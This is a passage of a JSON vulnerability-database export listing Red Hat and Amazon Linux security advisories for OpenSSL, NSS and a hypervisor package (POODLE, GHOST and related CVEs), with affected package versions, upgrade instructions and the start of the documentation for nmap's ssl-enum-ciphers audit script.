"packageFilename": "openssl-devel-1.0.1e-30.el6_6.2.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.0.1e-30.el6_6.2", "arch": "s390x", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-30.el6_6.2.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "src", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-34.el7_0.6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "i686", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "x86_64", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "ppc", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1e-34.el7_0.6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl-perl", "packageFilename": "openssl-perl-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl-static", "packageFilename": "openssl-static-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390x", "packageName": "openssl", "packageFilename": "openssl-1.0.1e-34.el7_0.6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390", "packageName": "openssl-libs", "packageFilename": "openssl-libs-1.0.1e-34.el7_0.6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.0.1e-34.el7_0.6", "arch": "s390", "packageName": "openssl-devel", "packageFilename": "openssl-devel-1.0.1e-34.el7_0.6.s390.rpm", "operator": "lt"}], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate; it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "reporter": "RedHat", "published": "2014-10-16T04:00:00", "type": "redhat", "title": "(RHSA-2014:1652) Important: openssl security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:06", "id": "RHSA-2014:1652", "href": "https://access.redhat.com/errata/RHSA-2014:1652", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T23:59:37", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.6-20150123.1.el6ev", "arch": "noarch", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.6-20150123.1.el6ev.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6.6-20150123.1.el6ev", "arch": "src", "packageName": "rhev-hypervisor6", "packageFilename": "rhev-hypervisor6-6.6-20150123.1.el6ev.src.rpm", "operator": "lt"}], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nA race condition flaw was found in the way the Linux kernel's KVM subsystem \nhandled PIT (Programmable Interval Timer) emulation. A guest user who has \naccess to the PIT I/O ports could use this flaw to crash the host. \n(CVE-2014-3611)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets.\nA man-in-the-middle attacker could use this flaw to force a TLS/SSL server\nusing OpenSSL to use TLS 1.0, even if both the client and the server\nsupported newer protocol versions. (CVE-2014-3511)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nIt was found that the Linux kernel's KVM subsystem did not handle the VM\nexits gracefully for the invept (Invalidate Translations Derived from EPT)\nand invvpid (Invalidate Translations Based on VPID) instructions. On hosts\nwith an Intel processor and invept/invppid VM exit support, an unprivileged\nguest user could use these instructions to crash the guest. (CVE-2014-3645,\nCVE-2014-3646)\n\nRed Hat would like to thank Qualys for reporting the CVE-2015-0235 issue,\nLars Bull of Google for reporting the CVE-2014-3611 issue, and the Advanced\nThreat Research team at Intel Security for reporting the CVE-2014-3645 and\nCVE-2014-3646 issues.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package.\n", "reporter": "RedHat", "published": "2015-02-04T05:00:00", "type": "redhat", "title": "(RHSA-2015:0126) Critical: rhev-hypervisor6 security update ", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3511", "CVE-2014-3567", "CVE-2014-3611", "CVE-2014-3645", "CVE-2014-3646", "CVE-2015-0235"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-07T08:59:40", "id": "RHSA-2015:0126", "href": "https://access.redhat.com/errata/RHSA-2015:0126", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2016-09-28T21:04:12", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "x86_64", "packageFilename": "openssl-1.0.1i-1.79.amzn1.x86_64", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "i686", "packageFilename": "openssl-devel-1.0.1i-1.79.amzn1.i686", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "i686", "packageFilename": "openssl-debuginfo-1.0.1i-1.79.amzn1.i686", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "i686", "packageFilename": "openssl-1.0.1i-1.79.amzn1.i686", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1i-1.79.amzn1.x86_64", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "src", "packageFilename": "openssl-1.0.1i-1.79.amzn1.src", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "i686", "packageFilename": "openssl-static-1.0.1i-1.79.amzn1.i686", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "i686", "packageFilename": "openssl-perl-1.0.1i-1.79.amzn1.i686", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1i-1.79.amzn1.x86_64", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1i-1.79.amzn1.x86_64", "packageName": "openssl-perl", "operator": "lt"}], "edition": 1, "description": "**Issue Overview:**\n\nBodo Moller, Thai Duong and Krzysztof Kotowicz of Google discovered a flaw in the design of SSL version 3.0 that would allow an attacker to calculate the plaintext of secure connections, allowing, for example, secure HTTP cookies to be stolen.\n\nhttp://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html \nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\n \n\n\n#### Special notes:\n\nWe have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with updated openssl packages that fix [CVE-2014-3566 __](<https://access.redhat.com/security/cve/CVE-2014-3566>).\n\nFor 2014.09 Amazon Linux AMIs, _openssl-1.0.1i-1.79.amzn1_ addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2014.03 repositories, _openssl-1.0.1i-1.79.amzn1_ also addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.09 or 2013.03 repositories, _openssl-1.0.1e-4.60.amzn1_ addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nIf you are using a pre-2013.03 Amazon Linux AMI, we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system. Note that you may need to run _yum clean all_ first. \n\n \n**New Packages:**\n \n \n i686: \n openssl-1.0.1i-1.79.amzn1.i686 \n openssl-debuginfo-1.0.1i-1.79.amzn1.i686 \n openssl-perl-1.0.1i-1.79.amzn1.i686 \n openssl-devel-1.0.1i-1.79.amzn1.i686 \n openssl-static-1.0.1i-1.79.amzn1.i686 \n \n src: \n openssl-1.0.1i-1.79.amzn1.src \n \n x86_64: \n openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64 \n openssl-static-1.0.1i-1.79.amzn1.x86_64 \n openssl-perl-1.0.1i-1.79.amzn1.x86_64 \n openssl-devel-1.0.1i-1.79.amzn1.x86_64 \n openssl-1.0.1i-1.79.amzn1.x86_64 \n \n \n", "reporter": "Amazon", "published": "2014-10-14T22:32:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "amazon", "title": "Important: openssl", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-14T23:34:00", "id": "ALAS-2014-426", "href": "https://alas.aws.amazon.com/ALAS-2014-426.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-28T21:04:14", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-tools-3.16.2-7.57.amzn1.i686", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "src", "packageFilename": "nss-3.16.2-7.57.amzn1.src", "packageName": "nss", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-pkcs11-devel-3.16.2-7.57.amzn1.i686", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-tools-3.16.2-7.57.amzn1.x86_64", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-devel-3.16.2-7.57.amzn1.x86_64", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-sysinit-3.16.2-7.57.amzn1.x86_64", "packageName": "nss-sysinit", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-debuginfo-3.16.2-7.57.amzn1.i686", "packageName": "nss-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-3.16.2-7.57.amzn1.x86_64", "packageName": "nss", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "x86_64", "packageFilename": "nss-debuginfo-3.16.2-7.57.amzn1.x86_64", "packageName": "nss-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-devel-3.16.2-7.57.amzn1.i686", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-sysinit-3.16.2-7.57.amzn1.i686", "packageName": "nss-sysinit", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57", "arch": "i686", "packageFilename": "nss-3.16.2-7.57.amzn1.i686", "packageName": "nss", "operator": "lt"}], "edition": 1, "description": "**Issue Overview:**\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n\n \n**Affected Packages:** \n\n\nnss\n\n \n**Issue Correction:** \nRun _yum update nss_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n nss-3.16.2-7.57.amzn1.i686 \n nss-sysinit-3.16.2-7.57.amzn1.i686 \n nss-devel-3.16.2-7.57.amzn1.i686 \n nss-tools-3.16.2-7.57.amzn1.i686 \n nss-debuginfo-3.16.2-7.57.amzn1.i686 \n nss-pkcs11-devel-3.16.2-7.57.amzn1.i686 \n \n src: \n nss-3.16.2-7.57.amzn1.src \n \n x86_64: \n nss-3.16.2-7.57.amzn1.x86_64 \n nss-tools-3.16.2-7.57.amzn1.x86_64 \n nss-debuginfo-3.16.2-7.57.amzn1.x86_64 \n nss-devel-3.16.2-7.57.amzn1.x86_64 \n nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64 \n nss-sysinit-3.16.2-7.57.amzn1.x86_64 \n \n \n", "reporter": "Amazon", "published": "2014-10-16T22:14:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "amazon", "title": "Important: nss", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-16T22:21:00", "id": "ALAS-2014-429", "href": "https://alas.aws.amazon.com/ALAS-2014-429.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-28T21:04:00", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "i686", "packageFilename": "openssl-1.0.1j-1.80.amzn1.i686", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "i686", "packageFilename": "openssl-debuginfo-1.0.1j-1.80.amzn1.i686", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "i686", "packageFilename": "openssl-perl-1.0.1j-1.80.amzn1.i686", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "src", "packageFilename": "openssl-1.0.1j-1.80.amzn1.src", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1j-1.80.amzn1.x86_64", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "x86_64", "packageFilename": "openssl-1.0.1j-1.80.amzn1.x86_64", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1j-1.80.amzn1.x86_64", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1j-1.80.amzn1.x86_64", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "i686", "packageFilename": "openssl-devel-1.0.1j-1.80.amzn1.i686", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "i686", "packageFilename": "openssl-static-1.0.1j-1.80.amzn1.i686", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1j-1.80", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1j-1.80.amzn1.x86_64", "packageName": "openssl-static", "operator": "lt"}], "edition": 1, "description": "**Issue Overview:**\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure Real-time Transport Protocol (SRTP) extension data. A remote attacker could send multiple specially crafted handshake messages to exhaust all available memory of an SSL/TLS or DTLS server. ([CVE-2014-3513 __](<https://access.redhat.com/security/cve/CVE-2014-3513>))\n\nA memory leak flaw was found in the way an OpenSSL handled failed session ticket integrity checks. A remote attacker could exhaust all available memory of an SSL/TLS or DTLS server by sending a large number of invalid session tickets to that server. ([CVE-2014-3567 __](<https://access.redhat.com/security/cve/CVE-2014-3567>))\n\nWhen OpenSSL is configured with \"no-ssl3\" as a build option, servers could accept and complete a SSL 3.0 handshake, and clients could be \nconfigured to send them. ([CVE-2014-3568 __](<https://access.redhat.com/security/cve/CVE-2014-3568>))\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system. Note that you may need to run _yum clean all_ first. \n\n \n**New Packages:**\n \n \n i686: \n openssl-1.0.1j-1.80.amzn1.i686 \n openssl-debuginfo-1.0.1j-1.80.amzn1.i686 \n openssl-devel-1.0.1j-1.80.amzn1.i686 \n openssl-static-1.0.1j-1.80.amzn1.i686 \n openssl-perl-1.0.1j-1.80.amzn1.i686 \n \n src: \n openssl-1.0.1j-1.80.amzn1.src \n \n x86_64: \n openssl-1.0.1j-1.80.amzn1.x86_64 \n openssl-perl-1.0.1j-1.80.amzn1.x86_64 \n openssl-debuginfo-1.0.1j-1.80.amzn1.x86_64 \n openssl-static-1.0.1j-1.80.amzn1.x86_64 \n openssl-devel-1.0.1j-1.80.amzn1.x86_64 \n \n \n", "reporter": "Amazon", "published": "2014-10-15T16:14:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "amazon", "title": "Important: openssl", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-15T18:38:00", "id": "ALAS-2014-427", "href": "https://alas.aws.amazon.com/ALAS-2014-427.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nmap": [{"lastseen": "2018-07-11T16:20:42", "references": [], "description": "This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the ciphersuites and compressors that a server accepts. \n\nEach ciphersuite is shown with a letter grade (A through F) indicating the strength of the connection. The grade is based on the cryptographic strength of the key exchange and of the stream cipher. The message integrity (hash) algorithm choice is not a factor. The output line beginning with `Least strength` shows the strength of the weakest cipher offered. The scoring is based on the Qualys SSL Labs SSL Server Rating Guide, but does not take protocol support (TLS version) into account, which makes up 30% of the SSL Labs rating. \n\nSSLv3/TLSv1 requires more effort to determine which ciphers and compression methods a server supports than SSLv2. A client lists the ciphers and compressors that it is capable of supporting, and the server will respond with a single cipher and compressor chosen, or a rejection notice. \n\nSome servers use the client's ciphersuite ordering: they choose the first of the client's offered suites that they also support. Other servers prefer their own ordering: they choose their most preferred suite from among those the client offers. In the case of server ordering, the script makes extra probes to discover the server's sorted preference list. Otherwise, the list is sorted alphabetically. \n\nThe script will warn about certain SSL misconfigurations such as MD5-signed certificates, low-quality ephemeral DH parameters, and the POODLE vulnerability. \n\nThis script is intrusive since it must initiate many connections to a server, and therefore is quite noisy. \n\nIt is recommended to use this script in conjunction with version detection (`-sV`) in order to discover SSL/TLS services running on unexpected ports. For the most common SSL ports like 443, 25 (with STARTTLS), 3389, etc. the script is smart enough to run on its own. \n\nReferences: \n\n * Qualys SSL Labs Rating Guide - https://www.ssllabs.com/projects/rating-guide/\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n## Example Usage \n \n \n nmap -sV --script ssl-enum-ciphers -p 443 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | ssl-enum-ciphers:\n | TLSv1.0:\n | ciphers:\n | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | 